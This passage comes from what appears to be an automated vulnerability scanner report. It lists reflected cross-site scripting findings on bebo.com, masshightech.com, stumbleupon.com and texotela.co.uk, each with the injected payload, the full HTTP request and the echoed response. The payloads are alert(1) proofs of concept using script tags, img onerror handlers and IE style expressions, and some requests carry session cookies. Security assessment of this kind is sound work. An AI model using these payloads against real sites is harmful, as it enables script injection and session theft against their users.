...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/searchce915';e214f87d530/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.40. http://www.bebo.com/c/search [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46c55<script>alert(1)</script>490543c8fe5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/search46c55<script>alert(1)</script>490543c8fe5 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14359
Date: Wed, 06 Jul 2011 14:07:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/search46c55<script>alert(1)</script>490543c8fe5 page, please try again.</div>
...[SNIP]...

2.41. http://www.bebo.com/c/search [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9366"><img%20src%3da%20onerror%3dalert(1)>4802e5762f0 was submitted in the REST URL parameter 2. This input was echoed as b9366"><img src=a onerror=alert(1)>4802e5762f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/searchb9366"><img%20src%3da%20onerror%3dalert(1)>4802e5762f0 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14460
Date: Wed, 06 Jul 2011 14:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-searchb9366"><img src=a onerror=alert(1)>4802e5762f0" >
...[SNIP]...

2.42. http://www.bebo.com/c/search [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c968d'><script>alert(1)</script>e9f84b94b5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/searchc968d'><script>alert(1)</script>e9f84b94b5a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14377
Date: Wed, 06 Jul 2011 14:07:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/searchc968d'><script>alert(1)</script>e9f84b94b5a&QueryString=&Lang=nl'>
...[SNIP]...

2.43. http://www.bebo.com/c/share [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ff82'><script>alert(1)</script>b4c625008d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/share9ff82'><script>alert(1)</script>b4c625008d9 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14383
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close
Set-Cookie: bvid=e85b586c-d7d6-477a-9024-84c53f54bbbf|1309951270768; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT
Set-Cookie: bdaysession=5e04af402d66ef5c146613174; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112110; domain=.bebo.com; path=/
Set-Cookie: bvid=8809abcd-d223-4323-b75e-c04e9b76a3ff|1309951270774; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/share9ff82'><script>alert(1)</script>b4c625008d9&QueryString=&Lang=nl'>
...[SNIP]...

2.44. http://www.bebo.com/c/share [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fda8'%3bf9fe007e964 was submitted in the REST URL parameter 2. This input was echoed as 2fda8';f9fe007e964 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/share2fda8'%3bf9fe007e964 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14172
Date: Wed, 06 Jul 2011 11:21:11 GMT
Connection: close
Set-Cookie: bvid=47f49dbe-4df3-4765-8e0a-63c4d257e18c|1309951271023; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT
Set-Cookie: bdaysession=51447a44a21fd851902326938; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112111; domain=.bebo.com; path=/
Set-Cookie: bvid=7f8404f5-7ebb-4d51-970a-de35a4e5580c|1309951271028; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/share2fda8';f9fe007e964/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.45. http://www.bebo.com/c/share [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9bac"><img%20src%3da%20onerror%3dalert(1)>daa7b2d9145 was submitted in the REST URL parameter 2. This input was echoed as d9bac"><img src=a onerror=alert(1)>daa7b2d9145 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/shared9bac"><img%20src%3da%20onerror%3dalert(1)>daa7b2d9145 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14466
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close
Set-Cookie: bvid=f4aa0b79-fb75-4839-896b-18502fafe041|1309951270201; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:09 GMT
Set-Cookie: bdaysession=1670347d2dc968af853000382; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112110; domain=.bebo.com; path=/
Set-Cookie: bvid=43120a6e-b3cb-4d1e-82ab-8eeae1353597|1309951270209; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-shared9bac"><img src=a onerror=alert(1)>daa7b2d9145" >
...[SNIP]...

2.46. http://www.bebo.com/c/share [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a620<script>alert(1)</script>d95bd966933 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/share4a620<script>alert(1)</script>d95bd966933 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14365
Date: Wed, 06 Jul 2011 11:21:12 GMT
Connection: close
Set-Cookie: bvid=d5af19e9-5d0f-4dbe-97ed-617f219bb6a2|1309951272151; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:11 GMT
Set-Cookie: bdaysession=4f68a69fc022b7cf48465072; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112112; domain=.bebo.com; path=/
Set-Cookie: bvid=519a5c42-9ce5-4d3c-bcf9-d51e0e8dd574|1309951272158; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/share4a620<script>alert(1)</script>d95bd966933 page, please try again.</div>
...[SNIP]...

2.47. http://www.bebo.com/c/skin/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46f4c'><script>alert(1)</script>dbd39a2012b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin46f4c'><script>alert(1)</script>dbd39a2012b/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/skin46f4c'><script>alert(1)</script>dbd39a2012b/index&QueryString=&Lang=nl'>
...[SNIP]...

2.48. http://www.bebo.com/c/skin/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a55"><img%20src%3da%20onerror%3dalert(1)>ab82706a93a was submitted in the REST URL parameter 2. This input was echoed as b6a55"><img src=a onerror=alert(1)>ab82706a93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skinb6a55"><img%20src%3da%20onerror%3dalert(1)>ab82706a93a/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14496
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-skinb6a55"><img src=a onerror=alert(1)>ab82706a93a-index" >
...[SNIP]...

2.49. http://www.bebo.com/c/skin/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0e56'%3be07a77c1e62 was submitted in the REST URL parameter 2. This input was echoed as e0e56';e07a77c1e62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/skine0e56'%3be07a77c1e62/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14202
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/skine0e56';e07a77c1e62/index/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pa
...[SNIP]...

2.50. http://www.bebo.com/c/skin/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59944<script>alert(1)</script>a37e8255df9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin59944<script>alert(1)</script>a37e8255df9/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14395
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/skin59944<script>alert(1)</script>a37e8255df9/index page, please try again.</div>
...[SNIP]...

2.51. http://www.bebo.com/c/skin/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf96b"><img%20src%3da%20onerror%3dalert(1)>310f8a32d96 was submitted in the REST URL parameter 3. This input was echoed as bf96b"><img src=a onerror=alert(1)>310f8a32d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skin/indexbf96b"><img%20src%3da%20onerror%3dalert(1)>310f8a32d96 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14222
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-skin-indexbf96b"><img src=a onerror=alert(1)>310f8a32d96" >
...[SNIP]...

2.52. http://www.bebo.com/c/skin/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c3c9'><script>alert(1)</script>b7a7735aa7d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin/index5c3c9'><script>alert(1)</script>b7a7735aa7d HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14128
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/skin/index5c3c9'><script>alert(1)</script>b7a7735aa7d&QueryString=&Lang=fr'>
...[SNIP]...

2.53. http://www.bebo.com/c/skin/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f827'%3b196d2336e59 was submitted in the REST URL parameter 3. This input was echoed as 9f827';196d2336e59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/skin/index9f827'%3b196d2336e59 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13934
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
agName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/skin/index9f827';196d2336e59/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.54. http://www.bebo.com/c/skin/index [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aff37<img%20src%3da%20onerror%3dalert(1)>5e4d93fe10c was submitted in the REST URL parameter 3. This input was echoed as aff37<img src=a onerror=alert(1)>5e4d93fe10c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skin/indexaff37<img%20src%3da%20onerror%3dalert(1)>5e4d93fe10c HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14204
Date: Wed, 06 Jul 2011 14:07:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: indexaff37<img src=a onerror=alert(1)>5e4d93fe10c.</div>
...[SNIP]...

2.55. http://www.masshightech.com/tech-news-widget/parser/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 50df4<script>alert(1)</script>a5ecb4fdf09 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp130996082326950df4<script>alert(1)</script>a5ecb4fdf09&_=1309960828682 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2358
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:18 GMT;path=/

jsonp130996082326950df4<script>alert(1)</script>a5ecb4fdf09({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDate":"July 6, 2011",
...[SNIP]...

2.56. http://www.stumbleupon.com/submit [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3945d"style%3d"x%3aexpression(alert(1))"b82259b5aa was submitted in the url parameter. This input was echoed as 3945d"style="x:expression(alert(1))"b82259b5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx3945d"style%3d"x%3aexpression(alert(1))"b82259b5aa HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49079
Date: Wed, 06 Jul 2011 11:16:01 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="https://www.microsoft.com/presspass/presskits/DCU/default.aspx3945d"style="x:expression(alert(1))"b82259b5aa" />
...[SNIP]...

2.57. http://www.texotela.co.uk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a571<script>alert(1)</script>9d4dfafd95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a571<script>alert(1)</script>9d4dfafd95d=1 HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4087
Connection: close
Content-Type: text/html; charset=utf-8

